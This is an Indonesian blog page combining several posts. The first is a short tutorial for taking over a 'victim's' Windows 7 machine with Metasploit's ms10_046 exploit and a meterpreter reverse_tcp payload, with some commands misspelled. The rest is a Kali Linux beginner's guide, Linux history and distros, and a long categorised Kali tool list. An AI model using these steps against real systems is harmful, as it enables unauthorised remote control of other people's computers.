Search This Blog

Tuesday, November 22, 2016

Cara hack Windows 7 Menggunakan Metasploit di kali Linux

Hallo sobat cyber kali ini saya akan menunjukan bagaimana cara nge-hack OS windows 7 menggunakan metasploit di kali linux, Mengekspolitasi kerentangan jendela untuk masuk kedalam sistem dengan username dan password menggunakan metasploit.

Sebelum nge-hack, Anda ingin mengetahui karangka metasploit. jika anda baru di dunia hacking anda harus mengetahui itu, bagaimana anda mau menjadi elit kalo hal itu anda tidak tau.??
Metasploit-porject adalah proyek keamanan komputer yang menyediakan informasi tentang kerentangan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan IDS.

yang paling terkenal  sub-proyek adalah open source Metasploit Framework, alat untuk mengembangakn dan melaksanakan memanfaatkan code terhadap mesin target jarak jau, sub-proyek lainya termasuk database Opcode shellcode dan terkait dengan penilitian perusahaan yang besar didalam dunia maya

Dan metasploit projeck terkenal alat anti-forensic dan penggelapan, dari beberapa banyaknya yang digabung kedalam Metasploit Framework

Persyaratan :
  • install Metasploit di kali linux
  • Rokok surya sebungkus
  • dan korek api biar bisa dinyalain rokoknya bos
Gak usah banyak bacot lagi, langsungke TKP
perhatitikan dengan teliti..............

1. Langkah pertama buka terminal kesayangan anda dan ketikan msfconsole.


2. Setelah msfconsule terbuka cepat ketikan perintah ini untuk mencari module
    #msf > expolit/windows/browser/ms 10_046_shortcut_icon_dllloader


3. Setelah itu kitikan #msf > set payload windows/meterpreter/reverse_tcp


4. Sekarang waktunya untuk melakukan beberapa konfigurasi untuk exploit/payload yang baru saja kita    atur, caranya kitikan perintah #msf > show options, (ingat anda harus mendapatkan dibawa output      yang defaul.)

5. Sekarang kita harus mangatur hots local untuk konfigurasi, caranya kitkan
   #msf > set SRVHOST 192.168.31.20 


6. Sekarang kita periksa apakah konfigurasi diterapkan, ketikan #msf > show options.


7. Sekarang kita star exploit, kitikan perintah #msf > exploit


8.  Setelah di eksekukusi kita harus "Server Started" (perlu di ingat pastikan bahwa server tidak               berjalan layanan web pada port 80) dan pada komputer korban cukup membuka Internet Explorer
    dan membuka http//192.168.31.20 maka kumputernya udah kita kuasai, artinya kita sudah                   berhasil bos... liat gambar dibawa ini


CATATAN : akan memberikan sebuah pop-up yang meminta izin, clik ALLOW dan pastikan anda tidak memiliki anti virus yang,
Anda dapat memeriksa jumlah sesi yang terhubung sukses dengan menjalankan perintah

9. OK selanjutnya ketikan perintah #meterpeter >session -i 1.


Setelah linux sudah terhubung dengan isi didalam sistem, kita sudah memiliki kontrol sepenuhnya jadi silakan anda kembangkan sendiri

PERHATIAN : tutorial ini hanya untuk tujan pendidikan saja

tutorial Hacking Dengan Kali Linux

Mengapa Kali Linux?

Dengan Kali Linux, hacking menjadi lebih mudah karena Anda memiliki semua alat (lebih dari 300 alat pra-instal) Anda mungkin pernah akan kebutuhan.Lainnya dapat didownload dengan mudah.Sekarang tutorial ini akan membantu Anda memulai dan Anda akan hacking dengan Kali Linux sebelum Anda tahu itu.
Masalah dengan pemula
Sekarang, saya sudah berurusan dengan pemula sejak lama. Apa yang mereka inginkan adalah sihir. Sebuah alat yang mudah digunakan, bekerja pada Windows, dapat di download dengan mencari di Google dan mengklik link pertama yang kita lihat, dan akan melakukan semua hacking itu sendiri pada menekan tombol. Sayangnya, tidak ada alat seperti itu. Hacking adalah seni, dan dibutuhkan tahun praktek untuk menguasainya. Jadi bagaimana untuk memulai? Memiliki tidak tahu tentang hacking adalah baik-baik saja, tapi yang newbie dengan komputer pada umumnya tidak diperbolehkan. Ketika saya mengatakan pemula, maksud saya seseorang yang tidak memiliki pengalaman dengan pemrograman dan hacking metodologi. Aku tidak bermaksud seseorang yang membutuhkan panduan 1 halaman tentang cara untuk men-download alat. Jika Anda ingin menjadi seorang hacker, Anda harus bekerja keras. Jadi bagaimana untuk memulai?Jika Anda telah menginstal Kali Linux,  klik di sini untuk melewatkan masa lalu paragraf instalasi dan pergi ke hacker bagian dari posting ini Mulai
Sekarang, saya tidak membosankan Anda dengan teori (^ Seolah-olah semua ini tidak cukup teori) . Tujuan saya adalah untuk mendapatkan Anda ke titik di mana Anda dapat mulai hacking dengan Kali Linux sesegera mungkin.Apa yang saya akan lakukan adalah memberi tahu Anda apa yang harus dilakukan. Proses ini agak sederhana: –

Hal-hal sulit sekarang

. Jika Anda tidak memiliki pengalaman sebelumnya dengan Linux dan mesin virtual dan semua itu, mendapatkan Kali Linux dan berjalan tidak akan menjadi sepotong kue Anda memiliki 2 pilihan:

1. Baca dokumentasi resmi Kali

Itu akan memberi Anda gambaran tentang apa yang mesin virtual, bagaimana OS dapat dijalankan dari USB, dan cara membuat partisi dan menjalankan 2 OS secara bersamaan. Ini adalah apa yang saya sarankan. Untuk itu, pergi ke Dokumentasi Kali Resmi  .

2. Baca versi saya modifikasi dari dokumentasi Kali

Pilihan kedua adalah dengan melihat tulisan ini, yang hanya hemat versi modifikasi dari dokumentasi Kali, dan tidak memberikan keuntungan selain menghemat waktu Anda sebagai dokumentasi mereka mencakup lebih dari apa yang di sini melakukan yang, dan Anda tidak benar-benar perlu untuk mengetahui semua begitu banyak … belum. Saya menghubungkan mereka di sini:

Command Line Interface

Beberapa perintah pesta
Sekarang, jika Anda benar-benar yakin tentang menjadi seorang hacker, Anda harus terbiasa dengan linux, dan khususnya antarmuka baris perintah. Hal ini sering dibandingkan dengan (dan memang demikian) ke command prompt Windows, tetapi cli Linux ‘jauh efisien dan lebih baik dari command prompt. Apa yang harus Anda lakukan adalah melakukan semua tugas-tugas yang biasa Anda lakukan di Windows cli Linux. Gunakan cd  untuk menavigasi,  poweroff  untuk shutdown, dll
Sebuah situs cukup mengagumkan untuk itu adalah – http://linuxcommand.org/
Akan melalui situs lengkap pada latihan cukup sendiri untuk membuat Anda sibuk selama satu bulan, tetapi Anda dapat melanjutkan secara bertahap.Beberapa tutorial pertama di sini akan perlu diingat bahwa Anda tidak memiliki banyak info tentang cli, dan akan benar-benar pemula ramah.

Beberapa Perintah Berguna:

Jika Anda tidak berencana untuk mempelajari semua perintah linux cli, berikut adalah beberapa yang akan membuat perahu Anda mengapung.
  1. Username dan password default adalah ‘ akar ‘dan’ toor ‘.
  2. Ketik ‘ poweroff ‘di terminal untuk shutdown.
  3. apt-get perintah dapat digunakan untuk menginstal alat dan update.
  4. apt-get pembaruan dan apt-get upgrade akan memperbarui semua program yang diinstal pada komputer Anda.
  5. apt-get dist-upgrade akan menginstal distribusi terbaru dari Kali (yakni upgrade OS Anda).
PS: Tapping <tab> sementara mengetik membuat Kali menyelesaikan kata untuk Anda. Penyadapan ganda <tab> membuat menampilkan semua kata-kata yang mungkin dimulai dengan kata yang tidak lengkap. Ctrl + c berhenti fungsi alat yang menjalankan. Menekan tombol panah atas menunjukkan perintah yang terakhir diketik.
Beberapa Nyata Hacking Dengan Kali Linux
Dengan asumsi Anda sudah melalui langkah-langkah di atas dan merasa nyaman dengan lingkungan hacker baru Anda, waktu untuk melakukan beberapa hacking nyata dengan Kali Linux . Rekomendasi saya akan memulai dengan hacking wifi, maka melakukan beberapa pengujian penetrasi, dan mungkin membaca sesuatu di Denial of Service ketika Anda memiliki waktu luang

Kali linux, Langkah awal menjadi seorang hacker

Jika kalian sudah familiar dengan istilah BackTrack, pasti kalian juga akan mudah mengenali Kali Linux.
Kali Linux merupakan salah satu versi linux yang bersumber dari Debian, kali linux di design untuk keperluan digital forensics dan penetration testing. kali linux sendiri dikelola dan dibiayai oleh Offensive Security Ltd. kali linux dibuat oleh Mati Aharoni dan Devon Kearns dari Offensive Security dengan cara menulis ulang source code dari BackTrack, versi kali linux mereka sebelumnya.
Kali Linux sudah memuat lebih dari 600 program yang digunakan untuk keperluan testing, hacking, scanning, Flooding dan masih banyak lagi, seperti nmap (port scanner), Wireshark (penganalisis paket), John the Ripper (Password Cracker), Aircrack-ng (untuk mengetes dengan cara penetrasi terus menerus terhadap WLAN), Burp suite dan OWASP ZAP (dua-duanya merupakan scanner keamaan aplikasi web). bisa anda bayangkan betapa banyaknya tools yang disediakan oleh Kali Linux, ini dapat memberikan ruang lingkup yang amat besar bagi user yang ingin menjelajahi dunia hacking.
Kelebihan Linux juga yaitu bisa langsung kita instalkan ke komputer, atau juga kita bisa menggunakan cara LIVE, artinya kita hanya tinggal memasukan CD/DVD linux (Flashdisk USB juga sudah didukung) lalu memakai mode LIVE, maka kita bisa menggunakan Linux/Kali Linux tanpa proses instalasi terlebih dahulu.
Kali Linux bisa kita dapatkan secara gratis, dengan mengunjungi situsnya yang beralamt di https://www.kali.org/.
kebanyakan tools yang dimiliki oleh kali linux mudah untuk digunakan, mungkin hanya beberapa baris script/command, namun tidak sedikit juga yang membutuhkan kesabaran dan juga teknik-teknik dalam menjalankan program tersebut. oleh karena itu butuh kesabaran untuk menjadi seorang hacker, terus lah berlatih dan jangan menyerah ketika kesulitan dalam menjalankan suatu “adegan” hacking.
penasaran dan ingin mencoba sistem operasi yang konon katanya wajib digunakan oleh seorang hacker ? silahkan download distibusi linux tersebut dan selamat berlatih.

PENGERTIAN LINUX

Adalah software sistem operasi open source yang gratis untuk disebarluaskan di bawah lisensi GNU. Linux merupakan turunan dari unix dan dapat bekerja pada berbagai macam perangkat keras koputer mulai dari inter x86 sampai dengan RISC.

Dengan lisensi GNU (Gnu Not Unix) Anda dapat memperoleh program, lengkap dengan kode sumbernya (source code). Tidak hanya itu, Anda diberikan hak untuk mengkopi sebanyak Anda mau, atau bahkan mengubah kode sumbernya.Dan itu semua legal dibawah lisensi. Meskipun gratis, lisensi GNU memperbolehkan pihak yang ingin menarik biaya untuk penggandaan maupun pengiriman program.


  1. SEJARAH LINUX
Linux pada awalnya dibuat oleh seorang mahasiswa Finlandia yang bernama Linus Torvalds. Dulunya Linux merupakan proyek hobi yang diinspirasikan dari Minix, yaitu sistem UNIX kecil yang dikembangkan oleh Andrew Tanenbaum. 
Linux versi 0.01 dikerjakan sekitar bulan Agustus 1991. Kemudian pada tanggal 5 Oktober 1991, Linus mengumumkan versi resmi Linux, yaitu versi 0.02 yang hanya dapat menjalankan shell bash (GNU Bourne Again Shell) dan gcc (GNU C Compiler).

Saat ini Linux adalah sistem UNIX yang sangat lengkap, bisa digunakan untuk jaringan, pengembangan software dan bahkan untuk pekerjaan sehari-hari. Linux sekarang merupakan alternatif sistem operasi yang jauh lebih murah jika dibandingkan dengan sistem operasi komersial (misalnya Windows 9.x/NT/2000/ME).
Linux mempunyai perkembangan yang sangat cepat. Hal ini dapat dimungkinkan karena Linux dikembangkan oleh beragam kelompok orang. Keragaman ini termasuk tingkat pengetahuan, pengalaman serta geografis. Agar kelompok ini dapat berkomunikasi dengan cepat dan efisien, internet menjadi pilihan yang sangat tepat.




  1. KELEBIHAN DAN KEKURANGAN LINUX
  1. Kelebihan

  • Bersifat open source, bebas dan terbuka. sehingga tidak perlu biaya untuk mendapatkannya. LISENSI FREE  dan boleh di utak atik semaunya.
  • Linux sekarang sudah mudah di operasikan. kalo dulu pengguna linux identik dengan para hacker, tapi sekarang orang awam pun sudah banyak yang menggunakannya.
  • Hampir semua aplikasi yang biasa dijalankan di windows, sudah ada aplikasi linuxnya yang dikembangkan oleh komunitas linux atau bisa juga menggunakan software emulator.
  • Memiliki pengamanan yang lebih unggul karena di desain multiuser sehingga apabila virus menyerang user tertentu, akan sangat sulit menyebar ke user lainnya.
  • Cocok untuk PC yang memiliki spesifikasi minimum karena linux membutuhkan resource yang lebih kecil dibandingkan Windows.
  • Linux dapat berjalan di dua mode.
  • Jarang crash atau nge-hang yang mengharuskan kita untuk merestart komputer karena linux lebih stabil.
  • Memiliki komunitas di berbagai penjuru dunia.
  • Terdapat beragam pilihan seperti Ubuntu, Fedora, Debian, Centos, RedHat, Opensuse, Mandriva, dan sebagainya.

  1. Kekurangan

  • Banyak user yang belum terbiasa menggunakan linux.
  • Dukungan hardware dari vendor-vendor tertentu yang tidak terlalu baik pada linux.
  • Proses instalasinya tidak semudah windows.
  • Aplikasi di linux belum seampuh aplikasi windows.
  • Bagi administrator sistem yang belum terbiasa dengan Unix-like, maka mau gak mau harus belajar dulu.
  • Struktur direktori dan hak akses yang membingungkan bagi user yang terbiasa menggunakan windows.
  1. PENGEMBANGAN LINUX
Nama "Linux" berasal dari nama pembuatnya, yang diperkenalkan tahun 1991 oleh Linus Torvalds. Sistemnya, peralatan sistem dan pustakanyaumumnya berasal dari sistem operasi GNU, yang diumumkan tahun 1983 olehRichard Stallman. Kontribusi GNU adalah dasar dari munculnya nama alternatifGNU/Linux.

Linux telah lama dikenal untuk penggunaannya di server, dan didukung oleh perusahaan-perusahaan komputer ternama seperti IntelDellHewlett-PackardIBMNovellOracle CorporationRed Hat, dan Sun Microsystems. Linux digunakan sebagai sistem operasi di berbagai macam jenis perangkat keraskomputer, termasuk komputer desktopsuperkomputer, dan sistem benamseperti pembaca buku elektronik, sistem permainan video (PlayStation 2,PlayStation 3 dan XBox), telepon genggam dan router.

Para pengamat teknologi informatika beranggapan kesuksesan Linux dikarenakan Linux tidak bergantung kepada vendor (vendor independence), biaya operasional yang rendah, dan kompatibilitas yang tinggi dibandingkan versi UNIX tak bebas, serta faktor keamanan dan kestabilannya yang tinggi dibandingkan dengan sistem operasi lainnya seperti Microsoft Windows. Ciri-ciri ini juga menjadi bukti atas keunggulan model pengembangan perangkat lunak sumber terbuka (opensource software).

Sistem operasi Linux yang dikenal dengan istilah distribusi Linux (Linux distribution) atau distro Linux umumnya sudah termasuk perangkat-perangkat lunak pendukung seperti server webbahasa pemrogramanbasisdatatampilan desktop (desktop environment) seperti GNOME,KDE dan Xfce juga memilikipaket aplikasi perkantoran (office suite) seperti OpenOffice.orgKOffice,Abiword,


  1. MACAM-MACAM DISTRO LINUX

  1. Xandros
    Xandros Linux adalah sebuah distro Linux yang berdasarkan pada sistim KDE.Tampilannya sangat mirip dengan Microsoft Windows, jadi apabila dioperasikan sangat mudah dan nyaman.
  1. Ubuntu.
    Ubuntu adalah salah satu distribusi Linux yang berbasiskan pada Debian.
    Proyek Ubuntu disponsori oleh Canonical Ltd (perusahaan milik Mark Shuttleworth). Nama Ubuntu diambil dari nama sebuah konsep ideologi di Afrika Selatan. “Ubuntu” berasal dari bahasa kuno Afrika, yang berarti “rasa perikemanusian terhadap sesama manusia”.
  1. CentOS
Adalah sistem operasi bebas yang didasarkan pada Red Hat Enterprise Linux (RHEL). CentOS singkatan dari Community ENTerprise Operating System (Sistem Operasi Perusahaan buatan Komunitas/Masyarakat).
  1. Debian
    Debian adalah sistem operasi berbasis kernel Linux. Debian adalah ‘kernel independent’, yaitu sistem operasi Debian dikembangkan murni tanpa mendasarkan pada sistem operasi yang telah ada.
  1. Fedora (sebelumnya bernama Fedora Core, terkadang disebut juga dengan Fedora Linux) adalah sebuah distro Linux berbasis RPM dan yum yang dikembangkan oleh Fedora Project yang didukung oleh komunitas pemrogram serta disponsori oleh Red Hat. Nama Fedora berasal dari karakter fedora yang digunakan di logo Red Hat.
  1. Knoppix
    Knoppix adalah distro Linux live-cd yang dapat dijalankan melalui CD-ROM tanpa instalasi di hard disk. Distro ini berbasis Debian Linux dan diciptakan oleh Klaus Knopper.
  1. Gentoo Linux adalah suatu distribusi Linux yang memakai paket sistem manajemen Portage. [Bandingkan dengan: Debian yang menggunakan paket .deb, RedHat / Mandrake yang menggunakan paket .rpm. Manajemen paket ini dirancang untuk modular (mudah ditambah-tambah), portabel (dapat di port ke distro lain), mudah ditata, fleksibel, dan dioptimalkan untuk masing-masing komputer pengguna.
  1. Slackware
    Slackware merupakan sistem operasi yang dibuat oleh Patrick Volkerding dari Slackware Linux, Inc. Slackware merupakan salah satu distro awal, dan merupakan yang tertua yang masih dikelola. Tujuan utama Slackware adalah stabilitas dan kemudahan desain, serta menjadi distribusi Linux yang paling mirip Unix.
  1. Mandriva Linux
    Mandriva Linux (dahulu dikenal dengan nama Mandrakelinux atau Mandrake Linux) adalah sistem operasi yang dibuat oleh Mandriva (dahulu dikenal dengan nama Mandrakesoft).
    Mandriva Linux menggunakan RPM Package Manager.
  1. OpenSUSE
    SUSE sebelumnya bernama SUSE Linux dan SuSE Linux Professional adalah salah satu distro Linux dari perusahaan Novell, atau lebih tepat dari anak perusahaannya Suse Linux GmbH (Software- und System-Entwicklungsgesellschaft mbH, Nürnberg yang berarti pengembangan -perangkat lunak dan -sistem).
  1. Freespire
    Freespire adalah versi gratis dari distro Linspire (a.k.a Lindows), kemudian mungkin dikarenakan permasalahan nama, berubah menjadi Linspire.
  1. Linux Mint
    Linux Mint adalah sistem operasi berbasis Linux untuk PC. Inti dari LinuxMint adalah Ubuntu, sehingga aplikasi yang dapat berjalan di Ubuntu, juga bisa berjalan pada LinuxMint.
  1. PCLinuxOS
    PCLinuxOS, sering disingkat sebagai PCLOS, adalah sebuah sistem operasi desktop. Ini adalah sebuah sistem operasi bebas untuk komputer pribadi yang bertujuan untuk memudahkan penggunaan.
  1. Damn Small Linux
    Damn Small Linux (DSL) adalah salah satu distro/varian linux mini. Disebut mini karena paket DSL cuma 50MB besarnya. DSL juga memungkinkan untuk diinstall di USB 128MB.
Kuliax
  1. Kuliax adalah sebuah distribusi Linux LiveCD yang dikembangkan oleh Kuliax Project untuk pendidikan di universitas. Distribusi ini berbasis Debian GNU/Linux dan Knoppix, serta telah dioptimasi ke arah penggunaan desktop Linux.
  2. Redhat
    Distribusi yang paling populer, minimal di Indonesia, redhat merupakan distribusi pertama yang instalasi dan pengoperasiannya mudah.

Dan masih banyak lagi distro-distro lainnya ..

Friday, June 12, 2015

Nama-nama Tools Kali Linux

Nama-nama Tools Kali Linux









Top 10 Security Tools

  • aircrack-ng             
  • burpsuite             
  • hydra               
  • john             
  • maltego             
  • metasploit framework             
  • nmap                     
  • sqlmap   
  • wireshark              
  • zaproxy 


Information Gathering → DNS Analysis 
  • dnsdict6
  • dnsenum
  • dnsmap
  • dnsrecon
  • dnsrevenum6
  • dnstracer
  • dnswalk
  • fierce
  • Maltego 
  • nmap 
  • urlcrazy 
  • Zenmap 


Information Gathering → Live Host Identification
  • alive6
  • arping
  • cdpsnarf
  • detect-new-ip6
  • detect_sniffer6
  • dmitry
  • dnmap-client
  • dnmap-server
  • fping
  • hping3
  • inverse_lookup6
  • miranda
  • ncat
  • netdiscover
  • nmap
  • passive_discovery6
  • thcping6
  • wol-e
  • xprobe2
  • Zenmap



Information Gathering → OS Fingerprinting
  • dnmap-client
  • dnmap-server
  • miranda
  • nmap
  • Zenmap

Information Gathering → Route Analysis
  • 0trace
  • dnmap-client
  • dnmap-server
  • intrace
  • netmask
  • trace6



Information Gathering → SMB Analysis
  • acccheck
  • nbtscan
  • nmap
  • zenmap



Information Gathering → SNMP Analysis
  • braa
  • cisco-auditing-tool
  • cisco-torch
  • copy-router-config
  • merge-router-config
  • nmap
  • onesixtyone
  • snmpcheck
  • Zenmap


Information Gathering → Telephony Analysis
  • Ace

Information Gathering → VoIP Analysis
  • ace
  • enumiax


 
Vulnerability Analysis → Cisco Tools
  • cisco-auditinf-tool
  • cisco-global-exploiter
  • cisco-ocs
  • cisco-torch
  • yersinia



Vulnerability Analysis → Fuzzing Tools
  • bed
  • fuzz_ip6
  • ohrwurm
  • powerfuzzer
  • sfuzz
  • siparmyknife
  • spike-generic_chunked
  • spike-generic_listen_tcp
  • spike-generic_send_tcp
  • spike-generic_udp



Vulnerability Analysis → Open Source Assessment
  • casefile
  • Maltego


Web Applications → CMS Identification
  • blindelephant
  • plecost
  • wpscan



Web Applications → IDS/IPS Identification
  • ua-tester


Web Applications → Web Application Proxies
  • burpsuite
  • paros
  • proxystrike
  • vega
  • webscarab
  • zaproxy



Web Applications → Web Vulnerability Scanners
  • arachni_web
  • burpsuite
  • cadaver
  • davtest
  • deblaze
  • fimap
  • grabber
  • joomscan
  • nikto
  • padbuster
  • proxystrike
  • skipfish
  • sqlmap
  • uniscan-gui
  • vega
  • w3af
  • wapiti
  • webscarab
  • webshag-gui
  • websploit
  • whatweb
  • wpscan
  • xsser
  • zaproxy




Password Attacks → GPU Tools
  • oclhashcat-lite
  • oclhashcat-plus
  • pyrit



Password Attacks → Online Attacks
  • acccheck
  • burpsuite
  • cewl
  • cisco-auditing-tool
  • dbpwaudit
  • findmyhash
  • hydra
  • hydra-gtk
  • keimpx
  • medusa
  • ncrack
  • onesixtyone
  • patator
  • phrasendrescher
  • thc-pptp-bruter
  • webscarab
  • zaproxy



Wireless Attacks → Bluetooth Tools
  • bluelog 
  • bluemaho 
  • blueranger 
  • btscanner 
  • fang 
  • spooftooph 


Wireless Attacks → RFID/NFC Tools → NFC Tools
  • mfcuk 
  • mfoc 
  • mifare-classic-format 
  • nfc-list 
  • nfc-mfclassic 

 

Wireless Attacks → RFID/NFC Tools → RFIDiot FROSCH
  • read write clone unique (em4x02) 
  • reset hitag2 tag 
  • set fdx-b id 
  • test frosch reader 

 

Wireless Attacks → Wireless Tools
  • aircrack-ng 
  • asleap
  • bully
  • cowpatty
  • eapmd5pass 
  • fern-wifi-cracker 
  • genkeys 
  • genpmk 
  • giskismet 
  • kismet 
  • mdk3 
  • wifiarp 
  • wifidns 
  • wifi-honey 
  • wifiping 
  • wifitap 
  • wifite

Exploitation Tools → BeEF XSS Framework 
  • beef


Exploitation Tools → Exploit Database
  • searchsploit


Exploitation Tools → Network Exploitation
  • armitage
  • exploit6 
  • ikat 
  • jboss-autopwn-linux 
  • jboss-autopwn-win 
  • termineter 


Sniffing/Spoofing → Network Sniffers 
  • darkstat 
  • dnschef 
  • dnsspoof 
  • dnsniff 
  • ettercap-graphical 
  • hexinject 
  • mailsnarf
  • msgsnarf 
  • netsniff-ng 
  • passive_discovery6
  • responder 
  • sslsniff 
  • tcpflow 
  • urlsnarf 
  • webmitm 
  • webspy 
  • wireshark

Sniffing/Spoofing → Voice and Surveillance
  • msgsnarf

Sniffing/Spoofing → Web Sniffers
  • burpsuite 
  • dnsspoof 
  • driftnet 
  • ferret 
  • mitmproxy 
  • urlsnarf 
  • webmitm 
  • webscarab 
  • webspy 
  • zaproxy 


Maintaining Access → OS Backdoors
  • cymothoa 
  • dbd 
  • intersect 
  • powersploit 
  • sbd 
  • u3-pwn 
Maintaining Access → Web Backdoors
  • webacoo 
  • weevely
Reverse Engineering → Debuggers
  • edb-debugger 
  • ollydbg
Reverse Engineering → Misc RE Tools
  • apktool 
  • clang 
  • clang++ 
  • dexwjar 
  • flasm 
  • javasnoop 
  • radare2 
  • rafind2 
  • ragg2 
  • ragg2-cc 
  • rahash2 
  • rarun2 
  • rax2 

Stress Testing → Network Stress Testing
  • denial6 
  • dhcpig 
  • dos-new-ip6 
  • flodd_advertise6 
  • flood_dhcpc6 
  • flood_mld26 
  • flood_mld6 
  • flood_mldrouter6 
  • flood_router26 
  • flood_solicitate6 
  • fragmentation6 
  • inundator 
  • kill_router6 
  • macof 
  • rsmurf6 
  • siege 
  • smurf6 
  • t50
Stress Testing → Web Stress Testing
  • thc-ssl-dos

Hardware Hacking → Android Tools
  • android-sdk 
  • apktool 
  • baksmali 
  • dex2jar 
  • smali

Forensics → Anti-Virus Forensics Tools
  • chkrootkit

Forensics → Digital Forensics
  • autopsy 
  • binwalk 
  • bulk_extractor 
  • chkrootkit 
  • dc3dd 
  • dcfldd 
  • extundelete 
  • foremost 
  • fsstat 
  • galleta 
  • tsk_comparedir 
  • tsk_loaddb 

Forensics → Forensic Carving Tools
  • binwalk 
  • bulk_extractor 
  • foremost 
  • jls 
  • magicrescue 
  • pasco 
  • pev 
  • recoverjpeg 
  • rifiuti 
  • rifiuti2 
  • safecopy 
  • scalpel 
  • scrounge-ntfs 

 
Forensics → Forensic Imaging Tools
  • affcat 
  • affconvert 
  • blkls 
  • dc3dd 
  • dcfldd 
  • ddrescue 
  • ewfacquire 
  • ewfacquirestream 
  • ewfexport 
  • ewfinfo 
  • ewfverify 
  • fsstat 
  • guymager 
  • img_cat 
  • img_stat 
  • mmls 
  • mmstat 
  • tsk_gettimes

 
Forensics → Network Forensics
  • p0f

Forensics → PDF Forensic Tools
  • pdf-parser 
  • peepdf 

Reporting Tools → Documentation
  • dradis
  • keepnote

Reporting Tools → Evidence Management
  • casefile 
  • magictree 
  • maltego 
  • metagoofil 
  • pipal
  • truecrypt

Reporting Tools → Media Capture
  • cutycapt 
  • recordmydesktop

Information Gathering → IDS/IPS Identification 
  • fragroute
  • fragrouter 
  • ftest 
  • lbd 
  • wafw00f


Information Gathering → Network Scanner
  • dmitry
  • dnmap-client
  • dnmap-server
  • netdiscover
  • nmap
  • zenmap


Information Gathering → OSINT Analysis 
  • casefile
  • creepy
  • dmitry
  • jigsaw
  • maltego
  • metagoofil
  • theharvester
  • twofi
  • urlcrazy


Information Gathering → Service Fingerprinting
  • dnmap-client
  • dnmap-server
  • implementation6
  • implementation6d
  • ncat
  • nmap
  • sslscan
  • sslyze
  • tlssled
  • zenmap

Information Gathering → SMTP Analysis
  • nmap
  • smtp-user-enum
  • swaks
  • zenmap


Information Gathering → SSL Analysis
  • sslcaudit
  • ssldump
  • sslh
  • sslscan
  • sslsniff
  • sslstrip
  • sslyze
  • stunnel4
  • tlssled


Information Gathering → Traffic Analysis
  • 0trace
  • cdpsnarf
  • ftest
  • intrace
  • irpas-ass
  • irpass-cdp
  • p0f
  • tcpflow
  • wireshark

Information Gathering → VPN Analysis
  • ike-scan


Vulnerability Analysis → Database Assessment
  • bbqsql
  • dbpwaudit
  • hexorbase
  • mdb-export
  • mdb-hexdump
  • mdb-parsecsv
  • mdb-sql
  • mdb-tables
  • oscanner
  • sidguesser
  • sqldict
  • sqlmap
  • sqlninja
  • sqlsus
  • tnscmd10g

Vulnerability Analysis → Misc Scanners
  • lynis
  • nikto
  • nmap
  • unix-privesc-check
  • zenmap

Vulnerability Analysis → OpenVAS
  • openvas-gsd
  • openvas-setup


Web Applications → Database Exploitation
  • bbqsql
  • sqlninja
  • sqlsus



 Web Applications → Web Application Fuzzers
  • burpsuite
  • powerfuzzer
  • webscarab
  • webslayer
  • websploit
  • wfuzz
  • xsser
  • zaproxy


Web Applications → Web Crawlers
  • apache-users
  • burpsuite
  • cutycapt
  • dirb
  • dirbuster
  • vega
  • webscarab
  • webslayer
  • zaproxy


Password Attacks → Offline Attacks
  • cachedump
  • chntpw
  • cmospwd
  • crunch
  • dictstat
  • fcrackzip
  • hashcat
  • hash-identifier
  • john
  • johnny
  • lsadump
  • maskgen
  • oclhashcat-lite
  • oclhashcat-plus
  • ophcrack
  • ophcrack-cli
  • policygen
  • pwdump
  • pyrit
  • rainbowcrack
  • rcracki_mt
  • rsmangler
  • samdump2
  • sipcrack
  • sucrack
  • truecrack



Wireless Attacks → Other Wireless Tools
  • zbassocflood
  • zbconvert 
  • zbdsniff 
  • zbdump 
  • zbfind 
  • zbgoodfind 
  • zbreplay 
  • zbstumbler 


Wireless Attacks → RFID/NFC Tools → RFIDiot ACG
  • brute force hitag2 
  • bruteforce mifare 
  • calculate jcop mifare keys 
  • continuous select tag 
  • copy iso15693 tag 
  • epassport read write clone 
  • format mifare 1k value blocks 
  • identify hf tag type 
  • identify if tag type 
  • jcop info 
  • jcop mifare read write 
  • jcop set atr historical bytes 
  • read acg reader eeprom 
  • read if tag 
  • read mifare 
  • read tag 
  • read write clone unique (em4x02) 
  • reset q5 tag 
  • select tag 
  • set fdx-b id 
  • test acg lahf 

 

Wireless Attacks → RFID/NFC Tools → RFIDiot PCSC
  • bruteforce mifare 
  • calculate jcop mifare keys 
  • chip & pin info 
  • continuous select tag 
  • epassport read/write/clone 
  • identify hf tag type 
  • jcop info 
  • jcop mifare read/write 
  • jcop set atr historical bytes 
  • read mifare 
  • read tag 
  • select tag 


Exploitation Tools → Cisco Attacks
  • cisco-auditing-tool 
  • cisco-global-exploiter 
  • cisco-ocs 
  • cisco-torch 
  • yersinia 


Exploitation Tools → Metasploit
  • metasploit community / pro 
  • metasploit diagnostic logs 
  • metasploit diagnostic shell 
  • metasploit framework 
  • update metasploit 

Exploitation Tools → Social Engineering Toolkit
  • se-toolkit

Sniffing/Spoofing → Network Spoofing
  • dnschef 
  • ettercap-graphical 
  • evilgrade 
  • fake_advertise6
  • fake_dhcps6 
  • fake_dns6d 
  • fake_dnsupdate6 
  • fake_mipv6 
  • fake_mld26 
  • fake_mld6 
  • fake_mldrouter6 
  • fake_router26
  • fake_router6
  • fake_solicitate6 
  • fiked 
  • macchanger 
  • parasite6 
  • randicmp6 
  • rebind 
  • redir6 
  • responder
  • sniffjoke 
  • sslstrip 
  • tcpreplay 
  • wifi-honey 
  • yersinia 


Sniffing/Spoofing → VoIP Tools
  • iaxflood 
  • inviteflood 
  • ohrwurm 
  • protos-sip 
  • rtpbreak 
  • rtpflood 
  • rtpinsertsound 
  • rtpmixsound 
  • sctpscan 
  • sipmyknife 
  • sipp 
  • sipsak 
  • svcrack 
  • svcrash 
  • svmap 
  • svreport 
  • svwar 
  • viophopper



Maintaining Access → Tunneling Tools
  • cryptcat 
  • dbd 
  • dns2tcpc 
  • dns2tcpd 
  • iodine 
  • miredo 
  • ncat 
  • proxychains 
  • proxytunnel 
  • ptunnel 
  • pwnat 
  • sbd 
  • socat 
  • sslh 
  • stunnel4 
  • updtunnel 



Reverse Engineering → Disassembly
  • jad 
  • rabin2 
  • radiff2 
  • rasm2 
  • recstudio 
  • recstudio-cli



Stress Testing → VoIP Stress Testing
  • iaxflood 
  • inviteflood



Stress Testing → WLAN Stress Testing
  • mdk3 
  • reaver




Hardware Hacking → Arduino Tools
  • arduino

 

Forensics → Digital Anti-Forensics
  • chkrootkit



 

Forensics → Forensic Analysis Tools
  • affcompare 
  • affcopy 
  • affcrypto 
  • affdiskprint 
  • affinfo 
  • affsign 
  • affstats 
  • affuse 
  • affverify 
  • affxml 
